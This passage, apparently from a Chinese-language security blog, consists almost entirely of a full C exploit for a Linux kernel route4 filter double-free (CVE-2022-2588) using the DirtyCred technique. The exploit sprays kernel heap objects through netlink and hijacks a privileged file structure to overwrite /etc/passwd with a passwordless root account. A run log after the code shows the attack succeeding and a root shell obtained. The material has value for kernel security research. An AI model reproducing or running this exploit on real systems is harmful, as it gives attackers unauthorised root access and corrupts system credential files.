712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
// $ gcc -static -pthread -O0 ./exploit.c -o ./exploit
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <assert.h>
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mount.h>
#include <sys/msg.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#include <sys/shm.h>
#include <sys/stat.h>
#include <sys/timerfd.h>

#include <linux/tc_ematch/tc_em_meta.h>
#include <sys/resource.h>

#include <linux/capability.h>
#include <linux/futex.h>
#include <linux/genetlink.h>
#include <linux/if_addr.h>
#include <linux/if_ether.h>
#include <linux/if_link.h>
#include <linux/if_tun.h>
#include <linux/in6.h>
#include <linux/ip.h>
#include <linux/kcmp.h>
#include <linux/neighbour.h>
#include <linux/net.h>
#include <linux/netlink.h>
#include <linux/pkt_cls.h>
#include <linux/pkt_sched.h>
#include <linux/rtnetlink.h>
#include <linux/tcp.h>
#include <linux/veth.h>

#include <x86intrin.h>
#include <err.h>
#include <fcntl.h>
#include <poll.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/utsname.h>

char* target = "/etc/passwd"; // overwrite the target file
char* overwrite = "hi:x:0:0:root:/:/bin/sh\n"; // "user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash\n"
char* global;
char* self_path;
char* content; // evil data + existing data in the target file

#define PAGE_SIZE 0x1000
#define MAX_FILE_NUM 0x8000

int fds[MAX_FILE_NUM] = {};
int fd_2[MAX_FILE_NUM] = {};
int overlap_a = -1; // unprivileged `file`
int overlap_b = -1; // privileged `file`

int cpu_cores = 0; // num of cpu cores
int sockfd = -1;

int spray_num_1 = 2000; // 4000
int spray_num_2 = 4000; // 5000

int pipe_main[2]; // notify process to excecute using pipe
int pipe_parent[2];
int pipe_child[2];
int pipe_defrag[2];
int pipe_file_spray[2][2];

int run_write = 0; // let thread 2 begin to write evil data
int run_spray = 0; // let thread 3 begin to spray privileged `file`
bool overlapped = false;

void print_hex(char* buf, int size) {
int i;
puts("======================================");
printf("data :\n");
for (i = 0; i < (size / 8); i++) {
if (i % 2 == 0) {
printf("%d", i / 2);
}
printf(" %16llx", *(size_t*)(buf + i * 8));
if (i % 2 == 1) {
printf("\n");
}
}
puts("======================================");
}
// set cpu affinity
void pin_on_cpu(int cpu) {
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(cpu, &cpu_set);
if (sched_setaffinity(0, sizeof(cpu_set), &cpu_set) != 0) {
perror("sched_setaffinity()");
exit(EXIT_FAILURE);
}
}

static bool write_file(const char* file, const char* what, ...) {
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
va_end(args);
buf[sizeof(buf) - 1] = 0;
int len = strlen(buf);
int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return false;
if (write(fd, buf, len) != len) {
int err = errno;
close(fd);
errno = err;
return false;
}
close(fd);
return true;
}
// setup working dir
static void use_temporary_dir(void) {
system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data");
system("touch exp_dir/data2");
char* tmpdir = "exp_dir";
if (!tmpdir)
exit(1);
if (chmod(tmpdir, 0777))
exit(1);
if (chdir(tmpdir))
exit(1);
symlink("./data", "./uaf");
}
// setup process memory
static void adjust_rlimit() {
struct rlimit rlim;
rlim.rlim_cur = rlim.rlim_max = (200 << 20);
setrlimit(RLIMIT_AS, &rlim);
rlim.rlim_cur = rlim.rlim_max = 32 << 20;
setrlimit(RLIMIT_MEMLOCK, &rlim);
rlim.rlim_cur = rlim.rlim_max = 136 << 20;
// setrlimit(RLIMIT_FSIZE, &rlim);
rlim.rlim_cur = rlim.rlim_max = 1 << 20;
setrlimit(RLIMIT_STACK, &rlim);
rlim.rlim_cur = rlim.rlim_max = 0;
setrlimit(RLIMIT_CORE, &rlim);
// RLIMIT_FILE
rlim.rlim_cur = rlim.rlim_max = 14096;
if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) { // RLIMIT_NOFILE 最大打开文件描述符限制,默认为 1024, 需设置为 14096, 便于喷射 `file` 结构
rlim.rlim_cur = rlim.rlim_max = 4096;
spray_num_1 = 1200;
spray_num_2 = 2800;
if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) {
perror("[-] setrlimit");
err(1, "[-] setrlimit");
}
}
}

void setup_namespace() {
int real_uid = getuid();
int real_gid = getgid();

if (unshare(CLONE_NEWUSER) != 0) {
perror("[-] unshare(CLONE_NEWUSER)");
exit(EXIT_FAILURE);
}

if (unshare(CLONE_NEWNET) != 0) {
perror("[-] unshare(CLONE_NEWUSER)");
exit(EXIT_FAILURE);
}

if (!write_file("/proc/self/setgroups", "deny")) {
perror("[-] write_file(/proc/self/set_groups)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
perror("[-] write_file(/proc/self/uid_map)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
perror("[-] write_file(/proc/self/gid_map)");
exit(EXIT_FAILURE);
}
}

// set up process memory / working dir / namespace
void pre_exploit() {
adjust_rlimit();
use_temporary_dir();
setup_namespace();
}

#define NLMSG_TAIL(nmsg) \
((struct rtattr *)(((void *)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))
// add attribute
int addattr(char* attr, int type, void* data, int len) {
struct rtattr* rta = (struct rtattr*)attr;

rta->rta_type = type;
rta->rta_len = RTA_LENGTH(len);
if (len)
memcpy(RTA_DATA(attr), data, len);

return RTA_LENGTH(len);
}
// add attribute (maxlen limitation)
int addattr_l(struct nlmsghdr* n, int maxlen, int type, const void* data, int alen) {
int len = RTA_LENGTH(alen);
struct rtattr* rta;

if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) {
fprintf(stderr, "addattr_l ERROR: message exceeded bound of %d\n", maxlen);
return -1;
}
rta = NLMSG_TAIL(n);
rta->rta_type = type;
rta->rta_len = len;
if (alen)
memcpy(RTA_DATA(rta), data, alen);
n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
return 0;
}

struct rtattr* addattr_nest(struct nlmsghdr* n, int maxlen, int type) {
struct rtattr* nest = NLMSG_TAIL(n);

addattr_l(n, maxlen, type, NULL, 0);
return nest;
}

int addattr_nest_end(struct nlmsghdr* n, struct rtattr* nest) {
nest->rta_len = (void*)NLMSG_TAIL(n) - (void*)nest;
return n->nlmsg_len;
}
// add_qdisc() —— setup the socket
int add_qdisc(int fd) {
char* start = malloc(0x1000);
memset(start, 0, 0x1000);
struct nlmsghdr* msg = (struct nlmsghdr*)start;

// new qdisc nlmsghdr + tcmsg
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE;
msg->nlmsg_type = RTM_NEWQDISC;
struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));
// set local
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_parent = TC_H_ROOT;
// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);

addattr_l(msg, 0x1000, TCA_KIND, "sfq", 4); // sfq is not defaully configured, only qfq is configured
// print_hex(msg, msg->nlmsg_len);

struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};
return sendmsg(fd, &msgh, 0);
}
// spray 1 vulnerable object (filter) with customized flags
int add_tc_(int fd, u_int32_t from, u_int32_t to, u_int32_t handle, u_int16_t flags) {
char* start = malloc(0x2000);
memset(start, 0, 0x2000);
struct nlmsghdr* msg = (struct nlmsghdr*)start;

// new filter
msg = msg + msg->nlmsg_len;
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | flags;
msg->nlmsg_type = RTM_NEWTFILTER; // RTM_NEWTFILTER
struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));

// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_handle = handle;

addattr_l(msg, 0x1000, TCA_KIND, "route", 6);
struct rtattr* tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
addattr_l(msg, 0x1000, TCA_ROUTE4_FROM, &from, 4); // TCA_ROUTE4_FROM
addattr_l(msg, 0x1000, TCA_ROUTE4_TO, &to, 4); // TCA_ROUTE4_TO
addattr_nest_end(msg, tail);

// packing
struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};

sendmsg(fd, &msgh, 0);
free(start);
return 1;
}

void add_tc(int sockfd, uint32_t handle, uint16_t flag) {
add_tc_(sockfd, 0, handle, (handle << 8) + handle, flag);
}

uint32_t calc_handle(uint32_t from, uint32_t to) {
uint32_t handle = to;

assert(from <= 0xff && to <= 0xff);
handle |= from << 16;

if (((handle & 0x7f00) | handle) != handle)
return 0;

if (handle == 0 || (handle & 0x8000))
return 0;
return handle;
}

void* delete_tc_(int sockfd, u_int32_t handle) {
char* start = malloc(0x4000);
memset(start, 0, 0x4000);
struct nlmsghdr* msg = (struct nlmsghdr*)start;

// delete filter
msg = msg + msg->nlmsg_len;
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO;
msg->nlmsg_type = RTM_DELTFILTER; // RTM_DELTFILTER
struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));

// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_handle = handle;

addattr_l(msg, 0x1000, TCA_KIND, "route", 6);
struct rtattr* tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
addattr_nest_end(msg, tail);

// packing
struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};

sendmsg(sockfd, &msgh, 0);
memset(start, 0, 0x4000);
iov.iov_len = 0x4000;
iov.iov_base = start;
recvmsg(sockfd, &msgh, 0);

if (msgh.msg_namelen != sizeof(nladdr))
printf("[-] size of sender address is wrong\n");
return start;
}

void delete_tc(int sockfd, uint32_t handle) {
delete_tc_(sockfd, ((handle) << 8) + (handle));
}

// spray spray_count objects ???
int add_tc_basic(int fd, uint32_t handle, void* spray_data, size_t spray_len, int spray_count) {
assert(spray_len * spray_count < 0x3000);
char* start = malloc(0x4000);
memset(start, 0, 0x4000);
struct nlmsghdr* msg = (struct nlmsghdr*)start;

// new filter nlmsghdr + tcmsg
msg = msg + msg->nlmsg_len;
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; // | flags;
msg->nlmsg_type = RTM_NEWTFILTER; // RTM_NEWTFILTER
struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));

// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_handle = handle;
// t->tcm_parent = TC_H_ROOT;

addattr_l(msg, 0x4000, TCA_KIND, "basic", 6);
struct rtattr* tail = addattr_nest(msg, 0x4000, TCA_OPTIONS);
struct rtattr* ema_tail = addattr_nest(msg, 0x4000, TCA_BASIC_EMATCHES);
struct tcf_ematch_tree_hdr tree_hdr = { .nmatches = spray_count / 2,
.progid = 0 };

addattr_l(msg, 0x4000, TCA_EMATCH_TREE_HDR, &tree_hdr, sizeof(tree_hdr));
struct rtattr* rt_match_tail = addattr_nest(msg, 0x4000, TCA_EMATCH_TREE_LIST);

char* data = malloc(0x3000);
for (int i = 0; i < tree_hdr.nmatches; i++) {
char* current;
memset(data, 0, 0x3000);
struct tcf_ematch_hdr* hdr = (struct tcf_ematch_hdr*)data;
hdr->kind = TCF_EM_META;
hdr->flags = TCF_EM_REL_AND;

current = data + sizeof(*hdr);

struct tcf_meta_hdr meta_hdr = {
.left.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV,
.right.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV,
};

current += addattr(current, TCA_EM_META_HDR, &meta_hdr, sizeof(hdr));
current += addattr(current, TCA_EM_META_LVALUE, spray_data, spray_len);
current += addattr(current, TCA_EM_META_RVALUE, spray_data, spray_len);

addattr_l(msg, 0x4000, i + 1, data, current - data);
}

addattr_nest_end(msg, rt_match_tail);
addattr_nest_end(msg, ema_tail);
addattr_nest_end(msg, tail);

// packing
struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};
sendmsg(fd, &msgh, 0);
free(data);
free(start);
return 1;
}

void* delete_tc_basic(int sockfd, u_int32_t handle) {
char* start = malloc(0x4000);
memset(start, 0, 0x4000);
struct nlmsghdr* msg = (struct nlmsghdr*)start;

// delete filter
msg = msg + msg->nlmsg_len;
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO;
msg->nlmsg_type = RTM_DELTFILTER; // RTM_DELTFILTER
struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));

// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_handle = handle;
// t->tcm_parent = TC_H_ROOT;

addattr_l(msg, 0x1000, TCA_KIND, "basic", 6);
struct rtattr* tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
addattr_nest_end(msg, tail);

// packing
struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};

sendmsg(sockfd, &msgh, 0);
memset(start, 0, 0x4000);
iov.iov_len = 0x4000;
iov.iov_base = start;
recvmsg(sockfd, &msgh, 0);

if (msgh.msg_namelen != sizeof(nladdr))
printf("[-] size of sender address is wrong\n");

return start;
}
// slow_write() —— thread 1: occupy the write lock (write plenty of data)
void* slow_write() {
printf("[11-1] start slow write\n");
clock_t start, end;
int fd = open("./uaf", 1);
if (fd < 0) {
perror("[-] error open uaf file");
exit(-1);
}

unsigned long int addr = 0x30000000;
int offset;
for (offset = 0; offset < 0x80000 / 20; offset++) { // mmap space [0x30000000, 0x30000000 + 0x1000 * 0x80000 / 20]
void* r = mmap((void*)(addr + offset * 0x1000), 0x1000,
PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
if (r < 0)
printf("[-] allocate failed at 0x%x\n", offset);
}
assert(offset > 0);

void* mem = (void*)(addr);
memcpy(mem, "hhhhh", 5);
struct iovec iov[20];
for (int i = 0; i < 20; i++) { // write plenty of data (0x80000 * 0x1000 = 0x80 000 000 = 2GB)
iov[i].iov_base = mem;
iov[i].iov_len = offset * 0x1000;
}

run_write = 1; // notifiy thread 2 (unprivileged `file`) begin to write evil data
start = clock();

if (writev(fd, iov, 20) < 0)
perror("slow write");
end = clock();
double spent = (double)(end - start) / CLOCKS_PER_SEC;
printf("[*] write done, spent %f s\n", spent);
run_write = 0;
}
// write_cmd() —— thread 2: write evil data to the privileged file
void* write_cmd() {
struct iovec iov = { .iov_base = content, .iov_len = strlen(content) };

while (!run_write) {} // wait for thread 1 to prepare write
printf("[11-2] write evil data after the slow write\n");
run_spray = 1;
if (writev(overlap_a, &iov, 1) < 0)
printf("[-] failed to write\n");
}

void exploit() {
char msg[0x10] = {};
struct rlimit old_lim, lim, new_lim;

// Get old limits
if (getrlimit(RLIMIT_NOFILE, &old_lim) == 0)
printf("Old limits -> soft limit= %ld \t"
" hard limit= %ld \n",
old_lim.rlim_cur, old_lim.rlim_max);
pin_on_cpu(0);
printf("[*] starting exploit, num of cores: %d\n", cpu_cores);
// open & setup the socket
sockfd = socket(PF_NETLINK, SOCK_RAW, 0);
assert(sockfd != -1);
add_qdisc(sockfd);
// 3. allocate a route4_filter (vulnerable object)
if (read(pipe_child[0], msg, 2) != 2)
err(1, "[-] read from parent");
printf("[3] allocate the vulnerable filter\n");
add_tc_(sockfd, 0, 0, 0, NLM_F_EXCL | NLM_F_CREATE); // handle = 0

if (write(pipe_parent[1], "OK", 2) != 2)
err(1, "[-] write to child");
// 6. 1st free the route4_filter, return the `kmalloc-256` page to the page allocator
if (read(pipe_child[0], msg, 2) != 2)
err(1, "[-] read from parent");

// free the object, to free the slab
printf("[6] 1st freed the filter object\n");
// getchar();
add_tc_(sockfd, 0x11, 0x12, 0, NLM_F_CREATE); // handle = 0

// wait for the vulnerable object being freed
usleep(500 * 1000);
if (write(pipe_parent[1], "OK", 2) != 2)
err(1, "[-] write to child");
// 8. spray 4000 unprivileged `file`
if (read(pipe_child[0], msg, 2) != 2)
err(1, "[-] read from parent");

usleep(1000 * 1000);
printf("[8] spray 4000 uprivileged `file`\n");
for (int i = 0; i < spray_num_1; i++) {
pin_on_cpu(i % cpu_cores);
fds[i] = open("./data2", 1);
assert(fds[i] > 0);
}
// printf("pause before 2nd free\n");
// getchar();
// 9. 2nd free route4_filter, which will free the file
printf("[9] 2nd free the filter object\n");
add_tc_(sockfd, 0x11, 0x13, 0, NLM_F_CREATE); // handle = 0
printf("pause after 2nd free\n");
// getchar();
// sleep(10000);
usleep(1000 * 100); // should not sleep too long, otherwise file might be claimed by others

// 10. spray 5000 unprivileged `file` & find the overlapped file
printf("[10] spraying 5000 unprivileged `file`\n");
for (int i = 0; i < spray_num_2; i++) {
pin_on_cpu(i % cpu_cores);
fd_2[i] = open("./uaf", 1);
assert(fd_2[i] > 0);
for (int j = 0; j < spray_num_1; j++) {
// 10-1. spray one `file` & use kcmp to check if we take up the vulnerable object
if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, fds[j], fd_2[i]) == 0)
{
printf("[10-1] found overlapped file, id : %d, %d\n", i, j);
overlap_a = fds[j];
overlap_b = fd_2[i];
// 11. start 2 threads: Thread 1-take up write lock; Thread 2-write evil data
printf("[11] start 2 threads compete to write\n");
pthread_t pid, pid2;
pthread_create(&pid, NULL, slow_write, NULL);
pthread_create(&pid2, NULL, write_cmd, NULL);

while (!run_spray) {}
// 12. spray privileged `file` object
close(overlap_a); // ??????????? why release twice ???????????
close(overlap_b);

usleep(1000 * 100);
int spray_num = 4096;
write(pipe_file_spray[0][1], &spray_num, sizeof(int));
if (read(pipe_file_spray[1][0], &msg, 2) != 2)
err(1, "[-] read from file spray");
overlapped = true;
}
}
if (overlapped)
break;
}
// 13. finish exploitation
sleep(3);
while (run_write) { sleep(1); }
printf("[13] check whether we overwrite the privileged file\n");
if (!overlapped) {
printf("[-] no overlap found :(...\n");
write(pipe_main[1], "\xff", 1);
}
else {
int xx = open(target, 0);
char buf[0x100] = {};
// check if user (hi) in the passwd
read(xx, buf, 0x30);
if (!strncmp(buf, "hi", 2))
write(pipe_main[1], "\x00", 1);
else {
printf("[-] not successful : %s\n", buf);
write(pipe_main[1], "\xff", 1);
}
}
while (1) { sleep(1000); }
}

int run_exp() {
// 0. initialize pipe as notifier
if (pipe(pipe_parent) == -1)
err(1, "[-] fail to create pipes\n");
if (pipe(pipe_child) == -1)
err(1, "[-] fail to create pipes\n");
if (pipe(pipe_defrag) == -1)
err(1, "[-] fail to create pipes\n");
if (pipe(pipe_file_spray[0]) == -1) // begin spray file
err(1, "[-] fail to create pipes\n");
if (pipe(pipe_file_spray[1]) == -1) // end spray file
err(1, "[-] fail to create pipes\n");
cpu_cores = sysconf(_SC_NPROCESSORS_ONLN);

if (fork() == 0) {
// 12. Thread 3 - spray 4096*2 priviledged `file` objects to replace unprivileged `file` (wait pipe_file_spray[0])
adjust_rlimit();
int spray_num = 0;
if (read(pipe_file_spray[0][0], &spray_num, sizeof(int)) < sizeof(int)) // use pipe_file_spray to notify
err(1, "[-] read file spray");

printf("[12] got cmd, start spraying 4096*2 `file` by opening %s\n", target);
spray_num = 4096;
if (fork() == 0) { // spray 4096 `file` (parent-process)
for (int i = 0; i < spray_num; i++) {
pin_on_cpu(i % cpu_cores);
open(target, 0);
}
while (1) { sleep(10000); }
}
// spray 4096 `file` (sub-process)
for (int i = 0; i < spray_num; i++) {
pin_on_cpu(i % cpu_cores);
open(target, 0);
}
printf("[*] spray done\n");
write(pipe_file_spray[1][1], "OK", 2); // write pipe_file_spray[1] —— finish spray `file`
while (1) { sleep(10000); }
exit(0);
}
// 0. preprocess & start main exploit
if (fork() == 0) {
pin_on_cpu(0);
pre_exploit(); // set up process memory / working dir / namespace
exploit(); // main exploit
}
else
{
sleep(2);
if (fork() == 0)
{
// 1. defragmentation —— spray 10000 `file` to exhaust all file slabs for cross cache - all cores
adjust_rlimit();
printf("[1] defragmentation - spray 10000 `file` to exhaust all file slabs for cross cache\n");
for (int i = 0; i < 10000; i++) {
pin_on_cpu(i % cpu_cores);
open(target, 0);
}

if (write(pipe_defrag[1], "OK", 2) != 2)
err(1, "[-] failed write defrag");
while (1) { sleep(1000); }
}
else
{
// 2. spray thread - core 0 spray kmalloc-192 & kmalloc-256
setup_namespace();
pin_on_cpu(0);
int sprayfd = socket(PF_NETLINK, SOCK_RAW, 0);
assert(sprayfd != -1);
add_qdisc(sprayfd);
// 2-1. prepare payload
char msg[0x10] = {};
char payload[256] = {};
memset(payload + 0x10, 'A', 256 - 0x10);

if (read(pipe_defrag[0], msg, 2) != 2)
err(1, "[-] failed read defrag");

// if the exploit keeps failing, please tune the middle and end
int middle = 38; // 38
int end = middle + 40; // 40
// 2-2. spray (38+3)*32 filters in kmalloc-192 & kmalloc-256
printf("[2] spray (38+3)*32 kmalloc-192 & kmalloc-256\n");
for (int i = 0; i < middle; i++)
add_tc_basic(sprayfd, i + 1, payload, 193, 32);

add_tc_basic(sprayfd, middle + 1, payload, 193, 32);
add_tc_basic(sprayfd, middle + 2, payload, 193, 32);
add_tc_basic(sprayfd, middle + 3, payload, 193, 32);
if (write(pipe_child[1], "OK", 2) != 2)
err(1, "[-] write to parent\n");
// 4. spray more filters in kmalloc-192 & kmalloc-256
if (read(pipe_parent[0], msg, 2) != 2)
err(1, "[-] read from parent");
// add_tc_basic(sprayfd, middle+2, payload, 129, 32);

// prepare another part for cross cache
printf("[4] spray kmalloc-192 & kmalloc-256\n");
for (int i = middle + 2; i < end; i++)
add_tc_basic(sprayfd, i + 1, payload, 193, 32);
// 5. free (end-24)*32 kmalloc-192 & kmalloc-256
printf("[5] free (end-24)*32 kmalloc-192 & kmalloc-256\n");
for (int i = 1; i < end - 24; i++) {
// prevent double free of 192 and being reclaimed by others
if (i == middle || i == middle + 1)
continue;
delete_tc_basic(sprayfd, i + 1);
}
if (write(pipe_child[1], "OK", 2) != 2)
err(1, "[-] write to parent\n");
// 7. free (end-middle+1)*32 kmalloc-192 & kmalloc-256
if (read(pipe_parent[0], msg, 2) != 2)
err(1, "[-] read from parent");
// if (cpu_cores == 1) sleep(1);
printf("[7] free (end-middle+1)*32 kmalloc-192 & kmalloc-256\n");
delete_tc_basic(sprayfd, middle + 2);
delete_tc_basic(sprayfd, middle + 3);
delete_tc_basic(sprayfd, 1);
for (int i = middle + 2; i < end; i++)
delete_tc_basic(sprayfd, i + 1);
//getchar();
if (write(pipe_child[1], "OK", 2) != 2)
err(1, "[-] write to parent\n");
while (1) { sleep(1000); }
}
}
}

int main(int argc, char** argv) {
global = (char*)mmap(NULL, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_SHARED | MAP_ANON, -1, 0);
memset(global, 0, 0x2000);

self_path = global;
snprintf(self_path, 0x100, "%s/%s", get_current_dir_name(), argv[0]);
printf("[*] self path %s\n", self_path);
// prepare write data —— evil data + existing data in /etc/passwd
printf("[*] prepare evil data\n");
int fd = open(target, 0);
content = (char*)(global + 0x100);
strcpy(content, overwrite);
read(fd, content + strlen(overwrite), 0x1000);
close(fd);
// run_exp() in sub-process
assert(pipe(pipe_main) == 0);
if (fork() == 0) {
run_exp(); // main exploit
while (1) { sleep(10000); }
}
// judge if succeed
char data;
read(pipe_main[0], &data, 1);
if (data == 0)
printf("[+] succeed\n");
else
printf("[-] failed\n");
}

结果如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ ./exploit
[*] self path /home/hi/./exploit
[*] prepare evil data
Old limits -> soft limit= 14096 hard limit= 14096
[*] starting exploit, num of cores: 4
[1] defragmentation - spray 10000 `file` to exhaust all file slabs for cross cache
[2] spray (38+3)*32 kmalloc-192 & kmalloc-256
[3] allocate the vulnerable filter
[4] spray kmalloc-192 & kmalloc-256
[5] free (end-24)*32 kmalloc-192 & kmalloc-256
[6] 1st freed the filter object
[7] free (end-middle+1)*32 kmalloc-192 & kmalloc-256
[8] spray 4000 uprivileged `file`
[9] 2nd free the filter object
pause after 2nd free
[10] spraying 5000 unprivileged `file`
[10-1] found overlapped file, id : 22, 1930
[11] start 2 threads compete to write
[11-1] start slow write
[11-2] write evil data after the slow write
[12] got cmd, start spraying 4096*2 `file` by opening /etc/passwd
[*] spray done
[*] write done, spent 9.352879 s
[13] check whether we overwrite the privileged file
[+] succeed
$ su hi
Password:
# id
uid=0(hi) gid=0(root) groups=0(root)
# cat /etc/passwd
hi:x:0:0:root:/:/bin/sh
root::0:0:root:/root:/bin/bash

参考:CVE-2022-2588 Double-free 漏洞 DirtyCred 利用